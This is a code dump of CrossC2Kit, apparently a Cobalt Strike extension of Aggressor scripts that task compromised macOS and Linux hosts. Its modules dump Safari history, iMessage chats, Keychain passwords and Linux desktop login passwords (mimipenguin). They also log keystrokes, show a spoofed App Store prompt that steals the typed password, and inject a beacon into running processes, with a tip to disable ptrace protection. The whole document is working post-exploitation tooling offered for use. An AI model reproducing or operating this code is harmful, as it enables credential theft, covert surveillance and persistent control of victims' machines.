https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/browser/cc2_safari_dump.dylib -------------------------------------------------------------------------------- /gather/browser/safari_dump.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_safari_dump { 5 | blog($1, "\nUsage: cc2_safari_dump \n\tdump browser history from Safari.\nEx:\n\tcc2_safari_dump test 100"); 6 | } 7 | 8 | sub cc2_safari_dump { 9 | $taskName = "cc2_safari_dump"; # taskName 10 | $taskType = "dylib"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $username = $2; 15 | $queryCount = $3; 16 | $transportArg = $username."^".$queryCount; 17 | 18 | if ($username && $queryCount) { 19 | $loadlib = "gather/browser/cc2_safari_dump.dylib"; 20 | blog($beaconid, "cc2_safari_dump: "); 21 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 22 | } else { 23 | printUsage_safari_dump($beaconid); 24 | } 25 | 26 | } 27 | 28 | ssh_alias("cc2_safari_dump", &cc2_safari_dump); 29 | 30 | ssh_command_register("cc2_safari_dump", "CrossC2 safari dump - dump browser history from Safari(default 500).", "\nUsage: cc2_safari_dump \n\tdump browser history from Safari.\nEx:\n\tcc2_safari_dump test 100"); 31 | 32 | 33 | sub openSafariDialogCallBack { 34 | $bid = $3['bid']; 35 | $username = $3['d_username']; 36 | $queryCount = $3['d_count']; 37 | binput($bid, "cc2_safari_dump $username $queryCount"); 38 | cc2_safari_dump($bid, $username, $queryCount); 39 | } 40 | 41 | sub openSafariDialog { 42 | local('$bid $dialog'); 43 | $bid = $1; 44 | $dialog = dialog("Safari Dump", %(bid => $bid[0], d_username => "test", d_count => "100"), &openSafariDialogCallBack); 45 | dialog_description($dialog, "dump browser history from Safari"); 46 | 47 | 
drow_text($dialog, "d_username", "username: ", 20); 48 | drow_text($dialog, "d_count", "history count: ", 20); 49 | 50 | dbutton_action($dialog, "run"); 51 | dialog_show($dialog); 52 | } 53 | 54 | 55 | sub cc2_safari_dump_status { 56 | local('$bid $os $arch $system'); 57 | $bid = $1; 58 | $os = lc(beacon_info($bid, "os")); 59 | $arch = beacon_info($bid, "arch"); 60 | if ('macos' isin $os) { 61 | return 'MacOS(intel)'; 62 | } 63 | return ''; 64 | } -------------------------------------------------------------------------------- /gather/keychain/cc2_keychain_dump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/keychain/cc2_keychain_dump -------------------------------------------------------------------------------- /gather/keychain/cc2_keychain_list.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/keychain/cc2_keychain_list.dylib -------------------------------------------------------------------------------- /gather/keychain/keychain_dump.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_keychain_dump { 5 | blog($1, "\nUsage: cc2_keychain_dump /\n\tneed root permissions.\n\tdump login username & password from Keychain.\nEx:\n\tcc2_keychain_dump list\n\tcc2_keychain_dump /User/target/Library/Keychains/login.keychain {default}"); 6 | } 7 | 8 | sub cc2_keychain_dump { 9 | $taskName = "cc2_keychain_dump"; # taskName 10 | $taskType = "MachO"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $keychain = $2; 15 | $transportArg = $keychain."^".$3; 16 | 17 | if ($keychain) { 18 | if ($keychain eq "list") { 19 | 
$loadlib = "gather/keychain/cc2_keychain_list.dylib"; 20 | blog($beaconid, "cc2_keychain_dump: list"); 21 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 22 | } else { 23 | $loadlib = "gather/keychain/cc2_keychain_dump"; 24 | blog($beaconid, "cc2_keychain_dump: "); 25 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 26 | } 27 | } else { 28 | printUsage_keychain_dump($beaconid); 29 | } 30 | 31 | } 32 | 33 | ssh_alias("cc2_keychain_dump", &cc2_keychain_dump); 34 | 35 | ssh_command_register("cc2_keychain_dump", "CrossC2 Keychain dump (root) - dump login username & password from Keychain.", "\nUsage: cc2_keychain_dump /\n\tneed root permissions.\n\tdump login username & password from Keychain.\nEx:\n\tcc2_keychain_dump list\n\tcc2_keychain_dump /User/target/Library/Keychains/login.keychain {default}"); 36 | 37 | 38 | 39 | sub openKeychainDumpDialogCallBack { 40 | } 41 | 42 | sub openKeychainDumpDialog { 43 | } 44 | 45 | 46 | sub cc2_keychain_dump_status { 47 | local('$bid $os $arch $system'); 48 | $bid = $1; 49 | $os = lc(beacon_info($bid, "os")); 50 | $arch = beacon_info($bid, "arch"); 51 | if ('macos' isin $os) { 52 | return 'MacOS(intel)'; 53 | } 54 | return ''; 55 | } -------------------------------------------------------------------------------- /gather/keylogger/osx/cc2_keylogger.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/keylogger/osx/cc2_keylogger.dylib -------------------------------------------------------------------------------- /gather/keylogger/osx/keylogger_osx2.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_keylogger { 5 | blog($1, "\nUsage: cc2_keylogger \n\tlisten to the string entered by the user from the 
keyboard.\nEx:\n\tcc2_keylogger osx test"); 6 | } 7 | 8 | sub cc2_keylogger { 9 | $taskName = "cc2_keylogger_osx"; # taskName 10 | $taskType = "dylib"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "keystrokes"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $displayName = $2; 15 | $transportArg = $displayName."^"; 16 | 17 | $os = lc(beacon_info($bid, "os")); 18 | $arch = beacon_info($bid, "arch"); 19 | 20 | if ('macos' isin $os) { 21 | $loadlib = "gather/keylogger/osx/cc2_keylogger.dylib"; 22 | } else { 23 | berror($beaconid, "*[error]: Only supports osx."); 24 | printUsage_keylogger($beaconid); 25 | return; 26 | } 27 | if ($displayName) { 28 | blog($beaconid, "cc2_keylogger: "); 29 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 30 | } else { 31 | printUsage_keylogger($beaconid); 32 | } 33 | 34 | } 35 | 36 | ssh_alias("cc2_keylogger", &cc2_keylogger); 37 | 38 | ssh_command_register("cc2_keylogger", "CrossC2 keylogger - listen to the string entered by the user from the keyboard.", "\nUsage: cc2_keylogger \n\tlisten to the string entered by the user from the keyboard.\nEx:\n\tcc2_keylogger test"); 39 | 40 | sub openKeyloggerDialogCallBack { 41 | $bid = $3['bid']; 42 | $processName = $3['processName']; 43 | binput($bid, "cc2_keylogger $processName"); 44 | cc2_keylogger($bid, $processName); 45 | } 46 | 47 | sub openKeyloggerDialog { 48 | local('$bid $dialog'); 49 | $bid = $1; 50 | $dialog = dialog("CrossC2 keylogger (MacOS)", %(bid => $bid[0], processName => "test"), &openKeyloggerDialogCallBack); 51 | dialog_description($dialog, "listen to the string entered by the user from the keyboard"); 52 | 53 | drow_text($dialog, "processName", "ProcessDisplay: ", 20); 54 | 55 | dbutton_action($dialog, "run"); 56 | dialog_show($dialog); 57 | } 58 | 59 | 60 | 61 | sub cc2_keylogger_status { 62 | local('$bid $os $arch $system'); 63 | $bid = $1; 64 | $os = lc(beacon_info($bid, "os")); 65 | $arch = 
beacon_info($bid, "arch"); 66 | if ('macos' isin $os) { 67 | return 'MacOS(intel)'; 68 | } 69 | return ''; 70 | } -------------------------------------------------------------------------------- /gather/message/cc2_iMessage_dump.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/message/cc2_iMessage_dump.dylib -------------------------------------------------------------------------------- /gather/message/iMessage_dump.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_iMessage_dump { 5 | blog($1, "\nUsage: cc2_iMessage_dump \n\tdump message from iMessage.\nEx:\n\tcc2_iMessage_dump test 100"); 6 | } 7 | 8 | sub cc2_iMessage_dump { 9 | $taskName = "cc2_iMessage_dump"; # taskName 10 | $taskType = "dylib"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # keystrokes -> keylogger message 12 | 13 | $beaconid = $1; 14 | $username = $2; 15 | $queryCount = $3; 16 | $transportArg = $username."^".$queryCount; 17 | 18 | if ($username && $queryCount) { 19 | $loadlib = "gather/message/cc2_iMessage_dump.dylib"; 20 | blog($beaconid, "cc2_iMessage_dump: "); 21 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 22 | } else { 23 | printUsage_safari_dump($beaconid); 24 | } 25 | 26 | } 27 | 28 | ssh_alias("cc2_iMessage_dump", &cc2_iMessage_dump); 29 | 30 | ssh_command_register("cc2_iMessage_dump", "CrossC2 iMessage dump - dump message from iMessage.", "\nUsage: cc2_iMessage_dump \n\tdump message from iMessage.\nEx:\n\tcc2_iMessage_dump test 100"); 31 | 32 | sub openIMessageDumpDialogCallBack { 33 | $bid = $3['bid']; 34 | $username = $3['d_username']; 35 | $queryCount = $3['d_count']; 36 | binput($bid, "cc2_iMessage_dump $username $queryCount"); 37 | cc2_iMessage_dump($bid, 
$username, $queryCount); 38 | } 39 | 40 | sub openIMessageDumpDialog { 41 | local('$bid $dialog'); 42 | $bid = $1; 43 | $dialog = dialog("CrossC2 iMessage dump", %(bid => $bid[0], d_username => "test", d_count => "100"), &openIMessageDumpDialogCallBack); 44 | dialog_description($dialog, "dump message from iMessage"); 45 | 46 | drow_text($dialog, "d_username", "username: ", 20); 47 | drow_text($dialog, "d_count", "history count: ", 20); 48 | 49 | dbutton_action($dialog, "run"); 50 | dialog_show($dialog); 51 | } 52 | 53 | sub cc2_iMessage_dump_status { 54 | local('$bid $os $arch $system'); 55 | $bid = $1; 56 | $os = lc(beacon_info($bid, "os")); 57 | $arch = beacon_info($bid, "arch"); 58 | if ('macos' isin $os) { 59 | return 'MacOS(intel)'; 60 | } 61 | return ''; 62 | } -------------------------------------------------------------------------------- /gather/password/mimipenguin/cc2_mimipenguin.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_mimipenguin { 5 | blog($1, "\nUsage: cc2_mimipenguin\n\troot permissions\ndump the login password from the current linux desktop\nEx:\n\tcc2_mimipenguin"); 6 | } 7 | 8 | sub cc2_mimipenguin { 9 | $taskName = "cc2_mimipenguin"; # taskName 10 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # info -> normal message 12 | 13 | $beaconid = $1; 14 | 15 | $os = lc(beacon_info($beaconid, "os")); 16 | $arch = beacon_info($beaconid, "arch"); 17 | $transportArg = "blankArg"; 18 | 19 | $loadlib = $null; 20 | 21 | if ('linux' isin $os) { 22 | if ($arch eq 'x86') { 23 | $loadlib = "gather/password/mimipenguin/mimipenguin32.so"; 24 | } else if ($arch eq 'x64') { 25 | $loadlib = "gather/password/mimipenguin/mimipenguin.so"; 26 | } 27 | } else { 28 | berror($beaconid, "*[error]: Only supports linux."); 29 | } 30 | 31 | if ($loadlib) { 32 | blog($beaconid, "mimipenguin dump login password"); 33 | 
bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 34 | } 35 | } 36 | 37 | ssh_alias("cc2_mimipenguin", &cc2_mimipenguin); 38 | 39 | ssh_command_register("cc2_mimipenguin", "CrossC2 mimipenguin - dump the login password from the current linux desktop", "\nUsage: cc2_mimipenguin\n\tneed root permissions, dump the login password from the current linux desktop\nEx:\n\tcc2_mimipenguin"); 40 | 41 | sub openMimipenguinDialog { 42 | local('$bid $dialog'); 43 | $bid = $1; 44 | binput($bid, "cc2_mimipenguin"); 45 | cc2_mimipenguin($bid); 46 | } 47 | 48 | sub cc2_mimipenguin_status { 49 | local('$bid $os $arch $system'); 50 | $bid = $1; 51 | $os = lc(beacon_info($bid, "os")); 52 | $arch = beacon_info($bid, "arch"); 53 | if ('linux' isin $os) { 54 | if ($arch eq 'x86') { 55 | return 'Linux32'; 56 | } else if ($arch eq 'x64') { 57 | return 'Linux64'; 58 | } 59 | } 60 | return ''; 61 | } -------------------------------------------------------------------------------- /gather/password/mimipenguin/mimipenguin.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/password/mimipenguin/mimipenguin.so -------------------------------------------------------------------------------- /gather/password/mimipenguin/mimipenguin32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/password/mimipenguin/mimipenguin32.so -------------------------------------------------------------------------------- /gather/prompt/osx/cc2_prompt_spoof.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/gather/prompt/osx/cc2_prompt_spoof.dylib 
-------------------------------------------------------------------------------- /gather/prompt/osx/cc2_prompt_spoof_dylib.cna: -------------------------------------------------------------------------------- 1 | 2 | # include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_prompt_spoof { 5 | blog($1, "\nUsage: cc2_prompt_spoof \nEx:\n\tcc2_prompt_spoof osx English"); 6 | } 7 | 8 | sub cc2_prompt_spoof { 9 | $taskName = "cc2_prompt_spoof"; # taskName 10 | $taskType = "dylib"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # info -> normal message 12 | 13 | $beaconid = $1; 14 | $displayName = $2; 15 | $transportArg = $displayName."^"; 16 | 17 | $os = lc(beacon_info($beaconid, "os")); 18 | 19 | if ('macos' isin $os) { 20 | $loadlib = "gather/prompt/osx/cc2_prompt_spoof.dylib_bk"; 21 | } else { 22 | berror($beaconid, "*[error]: Only supports osx."); 23 | printUsage_prompt_spoof($beaconid); 24 | return; 25 | } 26 | if ($displayName) { 27 | blog($beaconid, "cc2_prompt_spoof: " . 
$displayName); 28 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 29 | } else { 30 | printUsage_prompt_spoof($beaconid); 31 | } 32 | 33 | } 34 | 35 | ssh_alias("cc2_prompt_spoof", &cc2_prompt_spoof); 36 | 37 | ssh_command_register("cc2_prompt_spoof", "CrossC2 prompt_spoof - (AppStore) interface pops up and prompts the user to enter a password, stealing the entered password", "\nUsage: cc2_prompt_spoof \nEx:\n\tcc2_prompt_spoof English"); 38 | 39 | 40 | sub openPromptSpoofDialogCallBack { 41 | $bid = $3['bid']; 42 | $processName = $3['processName']; 43 | binput($bid, "cc2_prompt_spoof $processName"); 44 | cc2_prompt_spoof($bid, $processName); 45 | } 46 | 47 | sub openPromptSpoofDialog { 48 | local('$bid $dialog'); 49 | $bid = $1; 50 | $dialog = dialog("CrossC2 prompt_spoof", %(bid => $bid[0], processName => "English"), &openPromptSpoofDialogCallBack); 51 | dialog_description($dialog, "(AppStore) interface pops up and prompts the user to enter a password, stealing the entered password"); 52 | 53 | drow_text($dialog, "processName", "ProcessDisplay: ", 20); 54 | 55 | dbutton_action($dialog, "run"); 56 | dialog_show($dialog); 57 | } 58 | 59 | 60 | sub cc2_prompt_spoof_status { 61 | local('$bid $os $arch $system'); 62 | $bid = $1; 63 | $os = lc(beacon_info($bid, "os")); 64 | $arch = beacon_info($bid, "arch"); 65 | if ('macos' isin $os) { 66 | return 'MacOS(intel)'; 67 | } 68 | return ''; 69 | } -------------------------------------------------------------------------------- /init/setup.cna: -------------------------------------------------------------------------------- 1 | include(script_resource("CrossC2Kit.cna")); 2 | popup generator { 3 | separator(); 4 | item "&CrossC2Kit Setup" { 5 | setupCrossC2KitPref(); 6 | } 7 | } 8 | 9 | sub modify_content { 10 | local('$flag $pathFlag $script_path $new_content $set_path $file $r_handle $index'); 11 | local('$metastr $realpath $change $w_handle'); 12 | $flag = "__CC2_INIT__:"; 13 | 
$pathFlag = "__CC2_INIT_PATH__"; 14 | $script_path = script_resource(); 15 | $new_content = ""; 16 | 17 | $set_path = $1; 18 | $file = $2; 19 | if ($set_path) { 20 | $script_path = $set_path; 21 | } 22 | 23 | $r_handle = openf($file); 24 | 25 | if (checkError($error)) { 26 | show_error("Could not open the file( $file ): $error"); 27 | } else { 28 | while $read (readln($r_handle)) { 29 | if ($flag isin $read) { 30 | $index = indexOf($read, $flag); 31 | if ($index ne $null) { 32 | $index = $index + strlen($flag); 33 | $metastr = substr($read, $index); 34 | $realpath = replace($metastr, $pathFlag, $script_path); 35 | $change = "$realpath #$flag$metastr"; 36 | $new_content = $new_content.$change."\n"; 37 | } 38 | } else { 39 | $new_content = $new_content.$read."\n"; 40 | } 41 | } 42 | closef($r_handle); 43 | } 44 | 45 | if ($new_content ne "") { 46 | $w_handle = openf(">$file"); 47 | if (checkError($error)) { 48 | show_error("Could not open the file( $file ): $error"); 49 | } else { 50 | writeb($w_handle, $new_content); 51 | closef($w_handle); 52 | } 53 | } 54 | } 55 | 56 | sub modify_modulepath { 57 | local('@filelist $set_path $file'); 58 | @filelist = @( 59 | "update_site/httprequest.cna", 60 | ); 61 | $set_path = $1; 62 | foreach $file(@filelist) { 63 | println("[cc2_setup]: $file "); 64 | modify_content($set_path, script_resource($file)); 65 | } 66 | } 67 | 68 | sub setupCrossC2KitPrefCallback { 69 | local('$cc2kit_dir'); 70 | $cc2kit_dir = $3['cc2kit_dir']; 71 | if ($cc2kit_dir) { 72 | pref_set("cc2kit_path", $cc2kit_dir); 73 | } 74 | modify_modulepath($cc2kit_dir); 75 | } 76 | 77 | sub setupCrossC2KitPref { 78 | local('$cc2kit_path $dialog'); 79 | 80 | $cc2kit_path = pref_get("cc2kit_path"); 81 | if ($cc2kit_path eq "") { 82 | $cc2kit_path = "/cs/script/CrossC2Kit"; 83 | } 84 | 85 | $dialog = dialog("Edit script", %(cc2kit_dir => $cc2kit_path), &setupCrossC2KitPrefCallback); 86 | dialog_description($dialog, "Setup CrossC2 Kit Path"); 87 | drow_text($dialog, 
"cc2kit_dir", "CrossC2 Kit Path: "); 88 | dbutton_action($dialog, "OK"); 89 | dialog_show($dialog); 90 | } 91 | 92 | local('$cc2kit_path'); 93 | $cc2kit_path = pref_get("cc2kit_path"); 94 | if ($cc2kit_path eq "") { 95 | println("[cc2_setup]: auto setup"); 96 | modify_modulepath(); 97 | } -------------------------------------------------------------------------------- /jobs/cc2_jobs.cna: -------------------------------------------------------------------------------- 1 | 2 | #include(script_resource("CrossC2Kit.cna")); 3 | 4 | sub printUsage_jobs { 5 | blog($1, "\nUsage: cc2_job (PID/all)\n\tcc2_job list\n\tcc2_job kill 222\n\tcc2_job kill all\n"); 6 | } 7 | 8 | sub cc2_job { 9 | $taskName = "cc2_job"; # taskName 10 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 11 | $taskResType = "info"; # info -> normal message 12 | 13 | $beaconid = $1; 14 | $jobType = $2; 15 | $optionalPID = $3; 16 | $transportArg = $jobType . "^" . $optionalPID; 17 | $arch = beacon_info($beaconid, "arch"); 18 | $os = lc(beacon_info($beaconid, "os")); 19 | if ('linux' isin $os) { 20 | if ($arch eq 'x86') { 21 | $loadlib = "jobs/cc2_jobs32.so"; 22 | } else if ($arch eq 'x64') { 23 | $loadlib = "jobs/cc2_jobs.so"; 24 | } 25 | } else if ('macos' isin $os) { 26 | $loadlib = "jobs/cc2_jobs.dylib"; 27 | } else { 28 | berror($beaconid, "*[error]: system $os "); 29 | printUsage_jobs($beaconid); 30 | } 31 | 32 | if ($jobType) { 33 | if ($jobType eq "kill") { 34 | if ($optionalPID eq $null) { 35 | berror($beaconid, "*[error]: PID"); 36 | printUsage_jobs($beaconid); 37 | return 0; 38 | } 39 | } else if ($jobType ne "list") { 40 | berror($beaconid, "*[error]: function type"); 41 | printUsage_jobs($beaconid); 42 | return; 43 | } 44 | binput($beaconid, "cc2_job $jobType $optionalPID"); 45 | bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg); 46 | } else { 47 | berror($beaconid, "*[error]: job type"); 48 | printUsage_jobs($beaconid); 49 | } 50 | } 51 | 52 | 
ssh_alias("cc2_job", &cc2_job); 53 | 54 | ssh_command_register("cc2_job", "CrossC2 joblist - Manage running tasks", "\nUsage: cc2_job (PID/all)\n\tcc2_job linux list\n\tcc2_job kill 222\n\tcc2_job kill all\n"); 55 | 56 | 57 | sub openJobDialog { 58 | local('$bid $dialog'); 59 | foreach $bid($1) { 60 | if ($2[0] eq "list") { 61 | cc2_job($bid, "list"); 62 | } else if ($2[1] eq "all") { 63 | cc2_job($bid, "kill", "all"); 64 | } else { 65 | prompt_text("Kill PID", "", lambda({ 66 | cc2_job($bid, "kill", "$1"); 67 | }, $bid => $bid)); 68 | } 69 | } 70 | } 71 | 72 | 73 | sub cc2_job_status { 74 | local('$bid $os $arch $system'); 75 | $bid = $1; 76 | $os = lc(beacon_info($bid, "os")); 77 | $arch = beacon_info($bid, "arch"); 78 | if ('linux' isin $os) { 79 | if ($arch eq 'x86') { 80 | return 'Linux32'; 81 | } else if ($arch eq 'x64') { 82 | return 'Linux64'; 83 | } 84 | } else if ('macos' isin $os) { 85 | return 'MacOS(intel)'; 86 | } 87 | return ''; 88 | } -------------------------------------------------------------------------------- /jobs/cc2_jobs.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/jobs/cc2_jobs.dylib -------------------------------------------------------------------------------- /jobs/cc2_jobs.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/jobs/cc2_jobs.so -------------------------------------------------------------------------------- /jobs/cc2_jobs32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/jobs/cc2_jobs32.so -------------------------------------------------------------------------------- /media/15854585486601/15854593957704.jpg: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/15854585486601/15854593957704.jpg -------------------------------------------------------------------------------- /media/16295280892271/16295284817531.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/16295280892271/16295284817531.jpg -------------------------------------------------------------------------------- /media/16295280892271/16295285029337.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/16295280892271/16295285029337.jpg -------------------------------------------------------------------------------- /media/16295280892271/16547563992094.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/16295280892271/16547563992094.jpg -------------------------------------------------------------------------------- /media/16295280892271/16547565084907.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/media/16295280892271/16547565084907.jpg -------------------------------------------------------------------------------- /patch/install_name_tool: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/patch/install_name_tool -------------------------------------------------------------------------------- /patch/libpatchelf.so: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/patch/libpatchelf.so -------------------------------------------------------------------------------- /patch/libpatchelf32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/patch/libpatchelf32.so -------------------------------------------------------------------------------- /process/libinjector64.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CrossC2/CrossC2Kit/8f0282789ec4f5cb3eae549e76e3b93fc88a1a62/process/libinjector64.so -------------------------------------------------------------------------------- /process/processhelper.cna: -------------------------------------------------------------------------------- 1 | 2 | sub bcc2_inject_cb { 3 | local('$taskName $taskType $taskResType'); 4 | local('$injectMOD $inject_PID $injectObjectPath'); 5 | local('$bid $args $transportArg'); 6 | $taskName = "cc2_inject"; # taskName 7 | $taskType = "so"; # $taskType -> ELF, MachO, so, dylib 8 | $taskResType = "info"; # info -> normal message 9 | 10 | $bid = $1; 11 | $args = $2; 12 | $injectMOD = $args[0]; 13 | $inject_PID = $args[1]; 14 | $injectObjectPath = $args[2]; 15 | $transportArg = 'bash^'.$injectObjectPath.'^'.$inject_PID; 16 | $transportArg = $injectObjectPath.'^'.$inject_PID; 17 | btask($bid, "[cc2_inject]: use MOD -> ".$injectMOD); 18 | bcrossc2_load_dyn($bid, $taskType, $taskName, $taskResType, $injectMOD, $transportArg); 19 | } 20 | 21 | sub bcc2_inject { 22 | local('$bid $inject_PID $inject_Data $savepath $savename $injectObjectPath'); 23 | local('$bd $os $arch $injectMOD'); 24 | # bcc2_inject($bid, $pid, $file, $temp_file_workpath); 25 | # -> check_os_arch($bid) 26 | # shell rm 
$temp_file_workpath+random(8) 27 | $bid = $1; 28 | $inject_PID = $2; 29 | $inject_Data = $3; 30 | $savepath = $4; 31 | $savename = random_string(8); 32 | if ($savepath eq '') { 33 | $savepath = '/tmp/'; 34 | } 35 | $injectObjectPath = $savepath.'/'.$savename; 36 | 37 | $bd = bdata($bid); 38 | $os = lc(beacon_info($bid, "os")); 39 | $arch = beacon_info($bid, "arch"); 40 | $injectMOD = $null; 41 | 42 | binput($bid, "cc2_inject $inject_PID libbeacon $savepath"); 43 | btask($bid, "[cc2_inject]: [tips]: [if ptrace attach failed]: echo 0 > /proc/sys/kernel/yama/ptrace_scope"); 44 | 45 | if ('linux' isin $os) { 46 | if ($arch eq 'x86') { 47 | $injectMOD = 'process/libinject32.so'; 48 | } else if ($arch eq 'x64') { 49 | $injectMOD = 'process/libinjector64.so'; 50 | } 51 | } else if ('macos' isin $os) { 52 | $injectMOD = 'process/libinject.dylib'; 53 | } 54 | 55 | if ($injectMOD) { 56 | btask($bid, "[cc2_inject]: inject ".$injectObjectPath." to pid-[".$inject_PID."]"); 57 | bawait_upload_raw($bid, $inject_Data, $savepath, $savename, &bcc2_inject_cb, @($injectMOD, $inject_PID, $injectObjectPath)); 58 | } else { 59 | berror($bid, "[cc2_inject]: unknow platform"); 60 | } 61 | } 62 | 63 | sub cc2_inject { 64 | local('$bid $pid $file $temp_file_workpath $handle $fileData'); 65 | $bid = $1; 66 | $pid = $2; 67 | $file = $3; 68 | if (-exists script_resource($3)) { 69 | $file = script_resource($3); 70 | } 71 | $handle = openf($loadFilePath); 72 | $fileData = readb($handle, -1); 73 | closef($handle); 74 | 75 | $temp_file_workpath = $4; 76 | if ($temp_file_workpath eq $null) { 77 | $temp_file_workpath = '/tmp/'; 78 | } 79 | bcc2_inject($bid, $pid, $fileData, $temp_file_workpath); 80 | } 81 | 82 | ssh_alias("cc2_inject", &cc2_inject); 83 | 84 | ssh_command_register("cc2_inject", "CrossC2 process inject", "\nUsage: cc2_inject PID lib_file_path workpath\n\tcc2_inject 1524 c:\\libtest.so /tmp/\n"); 85 | 86 | popup processbrowser { 87 | separator(); 88 | menu "&CC2ProcessHelper" { 89 | 
item "&inject" { injectDialog($1, $2); } 90 | } 91 | } 92 | sub injectDialogCallBack { 93 | local('$listener $bid $targetLines $libbeaconData $workspace'); 94 | $listener = $3['listener']; 95 | $bid = $3['bid']; 96 | $workspace = $3['workspace']; 97 | $injectPID = $3['injectPID']; 98 | # get libbeaconData from CrossC2 listener 99 | $libbeaconData = getCrossC2Beacon($listener, 'lib'); 100 | bcc2_inject($bid, $injectPID, $libbeaconData, $workspace); 101 | } 102 | 103 | sub injectDialog { 104 | local('%beaconListenerMap @beaconListenerMenu'); 105 | %beaconListenerMap = getCrossC2Listener(); 106 | @beaconListenerMenu = @(); 107 | foreach $key => $value (%beaconListenerMap) { 108 | add(@beaconListenerMenu, $value[0]); 109 | } 110 | $bid = $1; 111 | $injectPID = $2[0]['PID']; 112 | $dialog = dialog("Choose inject Listener", %(bid => $bid, injectPID => $injectPID, listener => $null, workspace => "/tmp/"), &injectDialogCallBack); 113 | drow_text($dialog, "workspace", "workspace: ", 20); 114 | drow_combobox($dialog, "listener", "CrossC2 Listener: ", @beaconListenerMenu); 115 | 116 | dbutton_action($dialog, "inject"); 117 | dialog_show($dialog); 118 | } 119 | 120 | 121 | sub openInjectDialogCallBack { 122 | local('$bid $f_server_lh $f_server_lp $f_token $protocol $s5_username $s5_password $s5_port'); 123 | local('$os $arch $system'); 124 | $listener = $3['listener']; 125 | $bid = $3['bid']; 126 | $workspace = $3['workspace']; 127 | $injectPID = $3['injectPID']; 128 | $lib_file = $3['libFile']; 129 | 130 | if ($listener) { 131 | $libbeaconData = getCrossC2Beacon($listener, 'lib'); 132 | bcc2_inject($bid, $injectPID, $libbeaconData, $workspace); 133 | } else if ($lib_file) { 134 | cc2_inject($bid, $injectPID, $lib_file, $workspace); 